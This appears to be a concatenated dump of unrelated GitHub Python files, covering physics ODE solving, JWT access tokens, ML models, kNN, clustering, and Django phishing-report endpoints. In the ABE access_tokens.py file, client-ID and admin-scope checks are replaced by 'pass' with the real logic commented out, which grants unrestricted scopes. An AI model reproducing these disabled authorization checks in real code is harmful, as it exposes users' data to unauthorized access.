full_output=True\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000) \n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n # ============================ \n \n # ============================ \n print(tLog.OK+'Finish solving E.o.M with odeintw. Current date and time :'\\\n , timeInitialDate.strftime(\"%Y-%m-%d %H:%M:%S\"))\n # Stop Calculating time\n timeFinalClock = time.time()\n # ============================\n # Calculate Elapsed Time\n tmpTimeCalculation = timeFinalClock-timeInitialClock\n # Define temporary time elapsed in second\n tmpTimeCalculationSec = 0\n # Hold it\n tmpTimeCalculationSec = tmpTimeCalculation\n # Print the time values\n days = tmpTimeCalculation // (24 * 3600)\n tmpTimeCalculation = tmpTimeCalculation % (24 * 3600)\n hours = tmpTimeCalculation // 3600\n tmpTimeCalculation %= 3600\n minutes = tmpTimeCalculation // 60\n tmpTimeCalculation %= 60\n seconds = tmpTimeCalculation\n print(tLog.INFO+\"Total Process Time, %6.2fs, d:h:m:s : %d:%d:%d:%d\"% (\\\n tmpTimeCalculationSec, days, hours, minutes, seconds))\n # ============================\n # Save Total Process Time to file\n # Do not color the [INFO]\n fileObject = open('distanceAndTime.log','a+')\n print('Total Process Time, %6.2fs, d:h:m:s : %d:%d:%d:%d'% (\\\n tmpTimeCalculationSec, days, hours, minutes, seconds), file=fileObject)\n fileObject.close()\n # ============================\n # Number Of Evolution\n print(tLog.INFO+'Number of evaluation: %d' % infow['nfe'][-1])\n # ============================\n # Check differential equation solver method changed or not\n methodIndicators = infow['mused']\n if methodIndicators[0] == 1:\n print(tLog.INFO+'Differential equation solver started with'\\\n ' Adams (nonstiff) method.')\n else:\n print(tLog.INFO+'Differential equation solver started with bdf (stiff) method.')\n indicatorChangePrint = [tLog.INFO\\\n +'Differential equation solver method is Adams (nonstiff)'\\\n , tLog.INFO+'Differential equation solver method is bdf (stiff) ']\n # ============================\n # If tmpIndicatorCheckControl == 1, the method changed.\n tmpIndicatorCheckControl = 0\n tmpIndicator = 0\n tmpIndicator = methodIndicators[0]\n # ============================\n # Check all steps, method is changed or not\n for it_methodIndicator in range(len(methodIndicators)):\n if methodIndicators[it_methodIndicator] != tmpIndicator:\n tmpIndicatorCheckControl = 1\n # Method changed\n if methodIndicators[it_methodIndicator] == 1:\n # To nonstiff\n print(str(indicatorChangePrint[0])+' at distance '\\\n +str(init.distAll_km[it_methodIndicator])+'.')\n tmpIndicator = methodIndicators[it_methodIndicator]\n if methodIndicators[it_methodIndicator] == 2:\n # To stiff\n print(str(indicatorChangePrint[1])+' at distance '\\\n +str(init.distAll_km[it_methodIndicator])+'.')\n tmpIndicator=methodIndicators[it_methodIndicator]\n # ============================\n # Print if the method is changed or not\n if tmpIndicatorCheckControl == 0:\n print(tLog.INFO+'Differential equation solver method have not changed.')\n elif tmpIndicatorCheckControl == 1:\n print(tLog.INFO+'Differential equation solver method have changed.')\n # ============================\n '''\n ALL INFOS\n 'hu' vector of step sizes successfully used for each time step.\n 'tcur' vector with the value of t reached for each time step.\n (will always be at least as large as the input times).\n 'tolsf' vector of tolerance scale factors, greater than 1.0,\n computed when a request for too much accuracy was detected.\n 'tsw' value of t at the time of the last method switch\n (given for each time step)\n 'nst' cumulative number of time steps\n 'nfe' cumulative number of function evaluations for each time step\n 'nje' cumulative number of jacobian evaluations for each time step\n 'nqu' a vector of method orders for each successful step.\n 'imxer' index of the component of largest magnitude in the weighted\n local error vector (e / ewt) on an error return, -1 otherwise.\n 'lenrw' the length of the double work array required.\n 'leniw' the length of integer work array required.\n 'mused' a vector of method indicators for each successful time step:\n 1: adams (nonstiff), 2: bdf (stiff)\n '''\n # ============================\n if init.technicalParametersDic['holdIntermediateData']:\n # Remove intermediateData folder\n rmtree(INTERMEDIATE_DATA_FOLDER)\n # Return Back To RESULTS_SIMULATION_DIR Folder\n osCommand.chdir(RESULTS_SIMULATION_DIR)\n\n return rhoFinalAll","repo_name":"bulmust/collNuPy","sub_path":"modules/diffSolvers.py","file_name":"diffSolvers.py","file_ext":"py","file_size_in_byte":18371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"31497065343","text":"import os\nimport time\nfrom binascii import hexlify\n\nimport jwt\n\nfrom abe import database as db\n\nADMIN_EMAILS = os.environ.get('ADMIN_EMAILS', '').split(',')\nOAUTH_REQUIRES_CLIENT_ID = os.environ.get('OAUTH_REQUIRES_CLIENT_ID')\n\nACCESS_TOKEN_SECRET = (os.environ.get('ACCESS_TOKEN_SECRET') or hexlify(os.urandom(32)))\n\nAUTHENTICATED_USER_CLAIMS = [\n 'create:events', 'edit:events', 'delete:events',\n 'create:ics',\n 'read:all_events',\n 'read:labels',\n]\n\nADMIN_USER_CLAIMS = AUTHENTICATED_USER_CLAIMS + [\n 'create:protected_events', 'edit:protected_events', 'delete:protected_events',\n 'create:labels', 'edit:labels', 'delete:labels',\n 'admin:apps',\n]\n\n\ndef create_access_token(**params):\n payload = {}\n payload.update(params)\n payload.update({'iat': int(time.time())})\n token = jwt.encode(payload, ACCESS_TOKEN_SECRET, algorithm='HS256').decode()\n return token\n\n\ndef get_access_token_provider(token):\n if is_valid_token(token):\n payload = jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256')\n return payload.get('provider')\n return None\n\n\ndef get_access_token_role(token):\n if is_valid_token(token):\n payload = jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256')\n return 'admin' if payload.get('email') in ADMIN_EMAILS else 'user'\n return None\n\n\ndef access_token_scopes(token):\n # The scope is computed based on the token's role, so that tokens stay\n # valid if the role -> scope map changes.\n scope = []\n if is_valid_token(token):\n payload = jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256')\n app = None\n if 'client_id' in payload:\n app = db.App.objects(client_id=payload['client_id']).first()\n if not app and OAUTH_REQUIRES_CLIENT_ID:\n pass # return scope\n role = get_access_token_role(token)\n if app and 'admin:*' not in app.scopes:\n pass # role == 'user'\n scope = ADMIN_USER_CLAIMS if role == 'admin' else AUTHENTICATED_USER_CLAIMS\n return scope\n\n\ndef is_valid_token(token):\n if not token:\n return False\n try:\n jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256') # for effect\n except Exception:\n return False\n return True\n","repo_name":"olin-build/ABE","sub_path":"abe/auth/access_tokens.py","file_name":"access_tokens.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"33"} +{"seq_id":"2760330654","text":"import pandas as pd, os\nfrom tortoise import Tortoise, run_async\n\nfrom gps_app.logic import DeviceLocationManager\nfrom gps_app.config import DBURL\n\ncsv_file = \"./static/raw_data.csv\"\n\nasync def connect_to_db()->None:\n await Tortoise.init(\n db_url=DBURL,\n modules={\"models\": [\"gps_app.models\"]}\n )\n\nasync def save_to_db(csv_file=csv_file):\n df = pd.read_csv(csv_file)\n df.sort_values('sts')\n for _, row in df.iterrows():\n data = {}\n data[\"device_id\"]=row[\"device_fk_id\"]\n data[\"latitude\"]=row[\"latitude\"]\n data[\"longitude\"]=row[\"longitude\"]\n data[\"timestamp\"]=row[\"time_stamp\"]\n data[\"sts\"]=row[\"sts\"]\n data[\"speed\"]=row[\"speed\"]\n await connect_to_db()\n await DeviceLocationManager.save_location(location_data=data)\n\ndef save_data_to_db_and_cache():\n run_async(save_to_db())","repo_name":"sineshashi/GPSTracker","sub_path":"scripts/migrate_from_excel.py","file_name":"migrate_from_excel.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32152599607","text":"from torch import nn\nimport numpy as np\n\nfrom .layers import Mixup, NormLinear\n\nclass ResidualBlock(nn.Module):\n def __init__(self, c_in, c_out, downsample=False) -> None:\n super(ResidualBlock, self).__init__()\n transform_residual = (c_in != c_out)\n self.bn1 = nn.BatchNorm2d(c_in)\n self.relu1 = nn.ReLU()\n self.block = []\n if downsample or transform_residual:\n if not downsample:\n stride = 1\n else:\n stride = 2\n self.block+= [nn.Conv2d(c_in, c_out, kernel_size=3, padding=1, stride=stride)]\n self.residual_conv = nn.Conv2d(c_in, c_out, kernel_size=1, padding=0, stride=stride)\n else:\n self.block+= [nn.Conv2d(c_out, c_out, kernel_size=3, padding=1)]\n self.residual_conv = None\n \n self.block+= [\n nn.BatchNorm2d(c_out),\n nn.ReLU(),\n nn.Conv2d(c_out, c_out, kernel_size=3, padding=1)]\n self.block = nn.Sequential(*self.block)\n\n def forward(self, x):\n if self.residual_conv is not None:\n x = self.relu1(self.bn1(x))\n return self.block(x) + self.residual_conv(x)\n return self.block(self.relu1(self.bn1(x))) + x\n\n\nclass WideResnet(nn.Module):\n def __init__(self, num_layers: int, num_classes: int = 10, num_channels: int = 160, num_input_channels: int = 3) -> None:\n super(WideResnet, self).__init__()\n if num_layers%6 != 2:\n raise AssertionError(\"num_layers has to equal 2 mod 6\")\n num_blocks = (num_layers-2)//6\n num_channels = [16, num_channels, num_channels * 2, num_channels * 4]\n self.conv1 = nn.Conv2d(num_input_channels, num_channels[0], kernel_size=3, padding=1)\n self.num_layers = len(num_channels)-1\n for i in range(1, len(num_channels)):\n block = []\n for j in range(num_blocks):\n downsample = False\n if j == 0 and i != 1:\n downsample = True\n if j == 0:\n block.append(ResidualBlock(num_channels[i-1], num_channels[i], downsample=downsample))\n else:\n block.append(ResidualBlock(num_channels[i], num_channels[i]))\n setattr(self, f\"layer{i}\", nn.Sequential(*block))\n self.relu = nn.ReLU()\n self.pool = nn.AdaptiveAvgPool2d(1)\n self.flatten = nn.Flatten()\n self.linear = NormLinear(num_channels[-1], num_classes)\n self.mixup = Mixup()\n\n def forward(self, x, labels=None, lambda_=None):\n mixup_level = None\n if lambda_ is not None:\n mixup_level = np.random.randint(0, self.num_layers+1)\n if mixup_level == 0:\n x, labels1, labels2 = self.mixup(x, labels, lambda_)\n x = self.conv1(x)\n for i in range(self.num_layers):\n layer = getattr(self, f\"layer{i+1}\")\n x = layer(x)\n if i+1 == mixup_level:\n x, labels1, labels2 = self.mixup(x, labels, lambda_)\n x = self.relu(x)\n x = self.pool(x)\n x = self.flatten(x)\n features = x\n x = self.linear(x)\n if labels is not None:\n return features, x, labels1, labels2\n return features, x\n\n def extract_features(self, x):\n return self.forward(x)[0]\n","repo_name":"KamilPiechowiak/fsl","sub_path":"src/feature_extractors/models/wide_resnet.py","file_name":"wide_resnet.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"6611364243","text":"from numpy import *\nimport os,sys\nimport operator\nimport numpy as np\nnp.set_printoptions(threshold=np.inf) # 全部显示\n\n# 创建数据\ndef createDataSet():\n\tgroup = array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])\n\tlabels = ['A','A','B','B']\n\treturn group,labels\n\n# k-近邻算法(坐标,坐标数组,对应的类型,前k个数据中最多)\ndef classify0(inX,dataSet,labels,k):\n\t# print(\"**classify0**\")\n\tdataSetSize = dataSet.shape[0] # 数组个数,数据个数\n\tdiffMat = tile(inX,(dataSetSize,1))-dataSet\n\tsqDiffMat = diffMat**2\n\tsqDistance = sqDiffMat.sum(axis=1)\n\tdistance = sqDistance**0.5\n\t# print(distance)\n\tsortedDistIndicies = distance.argsort() #返回从小到大的索引值\n\t# print(sortedDistIndicies)\n\tclassCount = {}\n\tfor i in range(k):\n\t\tvoteIlabel = labels[sortedDistIndicies[i]] # 最小的距离的类别标签\n\t\t # classCount.get(voteIlabel,0)返回字典classCount中voteIlabel元素对应的值,\n\t\t # 若不存在voteIlabel,则字典classCount中生成voteIlabel元素,并使其对应的数字为0\n\t\tclassCount[voteIlabel] = classCount.get(voteIlabel,0)+1 \n\n\t# print(classCount.items())\n\n\t# classCount.items() 获得所有键值对\n\n\t# a = [1,2,3] \n\t# b=operator.itemgetter(1) //定义函数b,获取对象的第1个域的值\n\t# b(a) \n\t# 2 \n\t# b=operator.itemgetter(1,0) //定义函数b,获取对象的第1个域和第0个的值\n \t# b(a) \n # (2, 1) \n\n # reverse=True 降序\n\tsortedClassCount = sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)\n\treturn sortedClassCount[0][0]\n\n# 将文本转换为Numpy 矩阵\ndef file2matrix(filename):\n\tfr = open(filename) # 打开文件\n\tarrayOLines = fr.readlines() # 按行读取 字符串数组\n\tnumberOfLines = len(arrayOLines) # 文件内容行数\n\treturnMat = zeros((numberOfLines,3)) # 根据行数创建以0填充的矩阵\n\n\tclassLabelVector = []\n\tindex = 0\n\n\tfor line in arrayOLines:\n\t\tline = line.strip() # 移除头尾的字符 空格\n\t\tlistFromLine = line.split('\\t') # 根据 \\t 拆分\n\t\t# 将数据前三列提取出来,存放到returnMat的NumPy矩阵中,也就是特征矩阵\n\t\t# [0:3]从第0个取,取3-0个数据 [1:4]从第0个取,取4-1个数据\n\t\treturnMat[index,:] = listFromLine[0:3]\n\t\tif listFromLine[-1] == 'didntLike':\n\t\t\tclassLabelVector.append(1)\n\t\telif listFromLine[-1] == 'smallDoses':\n\t\t\tclassLabelVector.append(2)\n\t\telif listFromLine[-1] == 'largeDoses':\n\t\t\tclassLabelVector.append(3)\n\t\tindex += 1\n\treturn returnMat,classLabelVector\n\n# 归一化特征值 某一数据/(这一列最大值 - 最小值) 百分比0-1之间的数\ndef autoNorm(dataSet):\n\t# dataSet.min()) #无参,所有中的最小值\n\t# dataSet.min(0)) # axis=0; 每列的最小值\n\t# dataSet.min(1)) # axis=1;每行的最小值\n\tminVals = dataSet.min(0)\n\tmaxVals = dataSet.max(0)\n\tranges = maxVals - minVals # 每一列最大值-最小值\n\n\tnormDataSet = zeros(shape(dataSet)) # 归零矩阵\n\n\tm = dataSet.shape[0] # 数组个数 m = 1000\n\n\t# a=[[1,2,3],[5,4]]\n\t# tile(a,[2,3])\n\t# array([[[1, 2, 3], [5, 4], [1, 2, 3], [5, 4], [1, 2, 3], [5, 4]],\n\t# [[1, 2, 3], [5, 4], [1, 2, 3], [5, 4], [1, 2, 3], [5, 4]]])\n\tnormDataSet = dataSet - tile(minVals,(m,1))\n\tnormDataSet = normDataSet/tile(ranges,(m,1))\n\treturn normDataSet,ranges,minVals\n\ndef datingClassTest():\n\thoRatio = 0.90 # 抽取数量百分比 随机抽取10%\n\tdatingDataMat,datingLabels = file2matrix('datingTestSet.txt') #读取数据\n\tnormMat,ranges,minVals = autoNorm(datingDataMat)\n\tm = normMat.shape[0]\n\tnumTestVecs = int(m*hoRatio) # 测试数据的数量\n\terrorCount = 0.0 # 错误数据的数量\n\n\tfor i in range(numTestVecs):\n\t\t# normMat[i,:] 取二维数组 第i行的所有的数据\n\t\t# normMat[numTestVecs:m,:] # 去除测试数据剩下的数据 二维数组\n\t\t# datingLabels[numTestVecs:m] # 去除测试数据剩下的数据\n\n\t\tclassifierResult = classify0(normMat[i,:],normMat[numTestVecs:m,:],\n\t\t\tdatingLabels[numTestVecs:m],3)\n\t\tprint (\"the classifier came back with:%d,the real answer is:%d\"\n\t\t%(classifierResult,datingLabels[i]))\n\t\tif(classifierResult!=datingLabels[i]):\n\t\t\tprint(\"-----\")\n\t\t\terrorCount += 1.0\n\tprint (\"the total error rate is:%f\"%(errorCount/float(numTestVecs)))\n\n# 是否是想要相亲的对象\ndef classifyPerson():\n\tresultList = ['not at all','in small doses','in large doses']\n\tpercentTats = float(input(\"percentage of time spent playing video games?\"))\n\tffMiles = float(input(\"frequent flier miles earned per year?\"))\n\ticeCream = float(input(\"liters of ice cream consumed per year?\"))\n\tdatingDataMat,datingLabels = file2matrix('datingTestSet.txt')\n\tnormMat,ranges,minVals = autoNorm(datingDataMat)\n\tinArr = array([ffMiles,percentTats,iceCream])\n\tclassifierResult = classify0((inArr-minVals)/ranges,normMat,datingLabels,3)\n\tprint(\"You will probably like this person: \",resultList[classifierResult-1])\n\n# 读取图片\ndef img2Vector(filename):\n\t# returnVect = zeros((1,1024))\n\t# print(returnVect)\n\treturnVect = zeros([1,1024]) # 创建一维数组个数1024\n\tfr = open(filename)\n\tfor i in range(32):\n\t\tlineStr = fr.readline() # 读出每一行数据\n\t\tfor j in range(32):\n\t\t\treturnVect[0,32*i+j] = int(lineStr[j])\n\treturn returnVect\n\n\n# 手写数字识别系统测试代码\ndef handwritingClassTest():\n\thwLabels = [] # 保存所有对应的数字\n\ttrainingFileList = os.listdir('digits/trainingDigits') # 读取文件夹下的所有文件名称\n\tm = len(trainingFileList) # 文件个数\n\ttrainingMat = zeros((m,1024)) # 用于保存数字文件内容\n\tfor i in range(m): # 循环遍历所有文件\n\t\tfileNameStr = trainingFileList[i] # 按顺序获取文件名全称\n\t\tfileStr = fileNameStr.split('.')[0] # 不包括扩展名的文件名\n\t\tclassNumStr = int(fileStr.split('_')[0]) # 获取数字\n\t\thwLabels.append(classNumStr) # 数字数组\n\t\ttrainingMat[i,:] = img2Vector('digits/trainingDigits/%s' % fileNameStr) # 数字内容\n\n\terrorCount = 0.0 #错误率\n\ttestFileList = os.listdir('digits/testDigits') # 测试文件夹下的所有文件名称\n\tmTest = len(testFileList) # 测试文件数量\n\tfor i in range(mTest):\n\t\tfileNameStr = testFileList[i]\n\t\tfileStr = fileNameStr.split('.')[0]\n\t\tclassNumStr = fileNameStr.split('_')[0]\n\t\tvectorUnderTest = img2Vector('digits/testDigits/%s' % fileNameStr)\n\t\tclassifierResult = classify0(vectorUnderTest,trainingMat,hwLabels,3)\n\t\t#print(\"the classifier came back with : %d,the real answer is : %s\"\n\t\t#\t%(classifierResult,classNumStr))\n\t\tif(classifierResult!=int(classNumStr)):\n\t\t\terrorCount += 1.0\n\t\t\tprint(str(fileNameStr) + \":\" + str(classifierResult))\n\tprint (\"\\nthe total number of errors is : %d\" % errorCount)\n\tprint (\"\\nthe total error rate is %f\" % (errorCount/float(mTest)))","repo_name":"shangchengwen/machine-learning","sub_path":"kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":6787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"41601813631","text":"import numpy as np\n\nfrom gcg.envs.env import Env\n\nclass Sampler(object):\n def __init__(self, env, policy, replay_pool):\n self._env = OneStepDelayAndHorizonEnvWrapper(env)\n self._policy = policy\n self._replay_pool = replay_pool\n\n self._curr_observation, self._curr_goal = None, None\n\n @property\n def env(self):\n return self._env.env\n\n def step(self, step, take_random_actions=False, explore=True, action=None, goal_override=None, use_labeller=True, **kwargs):\n if self._curr_observation is None or self._curr_goal is None:\n self.reset()\n\n \"\"\" Takes one step and adds to replay pool \"\"\"\n assert (self._env is not None)\n obs_im, obs_vec = curr_obs = self._curr_observation\n curr_goal = self._curr_goal\n if goal_override is not None:\n curr_goal = goal_override\n\n ### store last observations and get encoded\n curr_goal = self._replay_pool.store_observation(step, (obs_im, obs_vec), curr_goal, use_labeller=use_labeller)\n encoded_observation = self._replay_pool.encode_recent_observation()\n\n ### get actions\n action_info = dict()\n if take_random_actions:\n assert (action is None)\n action = self._env.action_selection_space.sample()\n else:\n if action is None:\n action, _, action_info = self._policy.get_action(\n step=step,\n current_episode_step=self._env.current_episode_step,\n observation=encoded_observation,\n goal=curr_goal,\n explore=explore)\n\n ### take step\n next_observation, goal, reward, done, env_info = self._env.step(action, **kwargs)\n env_info.update(action_info)\n\n if done:\n self._policy.reset_get_action()\n\n ### add to replay pool\n self._replay_pool.store_effect(action, reward, done, env_info)\n\n self._curr_observation = next_observation\n self._curr_goal = goal\n\n return curr_obs, curr_goal, action, reward, done, env_info\n\n def reset(self, **kwargs):\n assert (self._env is not None)\n\n self._curr_observation, self._curr_goal = self._env.reset(**kwargs)\n self._replay_pool.force_done()\n\n def get_current_goal(self, labeller=None):\n if labeller:\n return labeller.label(([self._curr_observation[0]], [self._curr_observation[1]]), [self._curr_goal])[0]\n else:\n return self._curr_goal\n\n @property\n def is_done(self):\n return self._env.is_done\n\n\nclass OneStepDelayAndHorizonEnvWrapper(Env):\n\n def __init__(self, env):\n self._env = env\n\n self._t = 0\n self._skip = False\n assert(np.isfinite(self._env.horizon))\n\n @property\n def env(self):\n return self._env\n\n def step(self, action, **kwargs):\n if self._skip:\n next_observation, goal = self._env.reset(**kwargs)\n reward = 0\n done = True\n env_info = dict()\n self._t = 0\n else:\n next_observation, goal, reward, done, env_info = self._env.step(action, **kwargs)\n self._t += 1\n\n if self._t >= self._env.horizon:\n done = True\n\n if self._skip:\n self._skip = False\n elif done:\n # delay done by one timestep\n self._skip = True\n done = False\n\n return next_observation, goal, reward, done, env_info\n\n def reset(self, **kwargs):\n obs, goal = self._env.reset(**kwargs)\n self._t = 0\n self._skip = False\n return obs, goal\n\n @property\n def action_selection_space(self):\n return self._env.action_selection_space\n\n @property\n def current_episode_step(self):\n return self._t\n\n @property\n def is_done(self):\n return self._skip\n\n","repo_name":"gkahn13/GtS","sub_path":"src/gcg/samplers/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"33"} +{"seq_id":"36934822332","text":"from rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework.status import (\n HTTP_200_OK,\n HTTP_400_BAD_REQUEST\n)\nfrom . import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .services import phishing_system\nimport re\nfrom .models import Message, Domain, Country\nimport pytz\nfrom urllib.parse import urlparse\nfrom django.db.models import Count\nfrom datetime import datetime\nfrom datetime import timedelta\n\nclass check_url_blacklist(generics.CreateAPIView):\n serializer_class = serializers.CheckUrlSerializer\n\n @csrf_exempt\n def post(self, request):\n body = request.data\n if 'message' in body:\n message = body['message']\n phishing = phishing_system.check_message(message)\n if phishing is None:\n return Response( \n status=HTTP_400_BAD_REQUEST\n )\n else:\n return Response(\n data=phishing,\n status=HTTP_200_OK\n )\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n\nclass obtain_phishing_message(generics.CreateAPIView):\n serializer_class = serializers.ReportMessageSerializer\n\n @csrf_exempt\n def post(self, request):\n body = request.data\n if 'message' in body and 'isoCode' in body and 'isPhishing' in body:\n message = body['message']\n url = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', message)\n if len(url) == 0:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n iso_code = body['isoCode'].lower()\n try:\n country_name = pytz.country_names[iso_code]\n except KeyError:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n country = Country.objects.get_or_create(name=country_name, country_iso_code=iso_code)\n\n domain_name = urlparse(url[0]).netloc\n domain = Domain.objects.get_or_create(name=domain_name)\n\n if body['isPhishing']:\n domain[0].frequency += 1\n domain[0].save()\n\n Message.objects.create(\n url=url[0],\n considered_phishing=body['isPhishing'],\n country=country[0],\n domain=domain[0]\n )\n\n return Response(\n data={\"result\": True},\n status=HTTP_200_OK\n )\n\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST\n )\n\nclass domain_list(generics.ListAPIView):\n serializer_class = serializers.DomainSerializer\n\n def get_queryset(self):\n return Domain.objects.all().filter(frequency__gt=0).order_by('-frequency')\n\n\nclass pie_chart(generics.ListAPIView):\n serializer_class = serializers.PieChartSerializer\n\n def get(self, request):\n phishing_messages = Message.objects.filter(considered_phishing=True).count()\n non_phishing_messages = Message.objects.filter(considered_phishing=False).count()\n return Response(\n data={\"phishing\": phishing_messages, \"non_phishing\": non_phishing_messages},\n status=HTTP_200_OK\n )\n\nclass bar_chart(generics.CreateAPIView):\n serializer_class = serializers.BarChartSerializer\n\n @csrf_exempt\n def post(self, request):\n if 'filter' in request.data:\n if request.data['filter'] == \"Este mes\":\n chart = Message.objects.filter(registered_date__gt=datetime.now() - timedelta(days=30)).filter(considered_phishing=True).values('country__name').annotate(total=Count('country__name')).order_by('-total')[:3]\n elif request.data['filter'] == \"Hoy\":\n chart = Message.objects.filter(registered_date__gt=datetime.now() - timedelta(days=1)).filter(considered_phishing=True).values('country__name').annotate(total=Count('country__name')).order_by('-total')[:3]\n elif request.data['filter'] == \"Esta semana\":\n chart = Message.objects.filter(registered_date__gt=datetime.now() - timedelta(days=7)).filter(considered_phishing=True).values('country__name').annotate(total=Count('country__name')).order_by('-total')[:3]\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST)\n return Response(\n data={\"chart\": chart},\n status=HTTP_200_OK\n )\n else:\n return Response(\n status=HTTP_400_BAD_REQUEST)\n","repo_name":"Phiseado/phisheado-backend","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"69870151134","text":"#!/usr/env python3\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans, MeanShift, estimate_bandwidth\nfrom sklearn.metrics import silhouette_score\nimport os\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tqdm import tqdm\nimport logging\nimport sys\n\n# Configurer le module logging pour afficher les informations à la sortie standard\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\ndef read_data(file_path):\n \"\"\" Cette fonction lit le fichier csv et retourne un dataframe Pandas.\"\"\"\n print('Loading data...')\n data = pd.read_csv(file_path)\n print('Data loaded successfully.')\n \n # Convertir Downloads en nombre entier\n data['Downloads'] = data['Downloads'].str.extract('(\\d+)').astype(int)\n \n # One-hot encoding pour les colonnes catégorielles\n print('Encoding categorical features...')\n encoder = OneHotEncoder(sparse_output=False)\n encoded_features = encoder.fit_transform(data[['Author', 'Subject', 'LoC Class']])\n encoded_df = pd.DataFrame(encoded_features, columns=encoder.get_feature_names_out(['Author', 'Subject', 'LoC Class']))\n \n # Concaténer le dataframe encodé avec le dataframe original\n data = pd.concat([data, encoded_df], axis=1)\n print('Categorical features encoded successfully.')\n \n # Supprimer les colonnes non pertinentes\n data.drop(['Title', 'URL', 'Author', 'Subject', 'LoC Class'], axis=1, inplace=True)\n return data\n\ndef kmeans_clustering(data):\n \"\"\" Cette fonction effectue le clustering KMeans sur le dataframe donné en entrée et renvoie le modèle entraîné.\"\"\"\n print('Performing KMeans clustering...')\n kmeans = KMeans(n_clusters=3, n_init=10).fit(data)\n score = silhouette_score(data, kmeans.labels_)\n print(f'Silhouette score for KMeans: {score}')\n return kmeans\n\ndef mean_shift_clustering(data):\n print('Performing MeanShift clustering...')\n bandwidth = estimate_bandwidth(data, quantile=0.2, n_samples=100)\n model = MeanShift(bandwidth=bandwidth, bin_seeding=True).fit(data)\n score = silhouette_score(data, model.labels_)\n print(f'Silhouette score for MeanShift: {score}')\n return model\n\ndef plot_clusters(data, kmeans_model, mean_shift_model):\n print('Plotting clusters...')\n fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(15, 5))\n\n axs[0].set_title('kmeans')\n axs[0].scatter(data.iloc[:, 0], data.iloc[:, 1], c=kmeans_model.labels_, cmap='viridis')\n\n axs[1].set_title('MeanShift')\n axs[1].scatter(data.iloc[:, 0], data.iloc[:, 1], c=mean_shift_model.labels_, cmap='viridis')\n\n plt.tight_layout()\n \n if not os.path.exists('graphs'):\n os.makedirs('graphs')\n \n plt.savefig('graphs/clusters.png')\n print('Clusters plotted and saved successfully.')\n plt.close()\n\ndef perform_data_clustering():\n print('Starting data clustering...')\n data = read_data('/home/anis/Bureau/git-work /Gutenberg-Project/books_info.csv')\n kmeans_model = kmeans_clustering(data)\n mean_shift_model = mean_shift_clustering(data)\n plot_clusters(data, kmeans_model, mean_shift_model)\n print('Data clustering completed successfully.')\n\ndef main():\n perform_data_clustering()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Anis-cpu-13/Gutenberg-Project","sub_path":"data_clustering.py","file_name":"data_clustering.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"6657621582","text":"import heapq\r\nimport random\r\n\r\nheap = []\r\nheapq.heapify(heap)\r\n\r\narr = [ [7,2,4],\r\n [5,0,6],\r\n [8,3,1] ]\r\n\r\nFinal_ans = [\r\n [1,2,3],\r\n 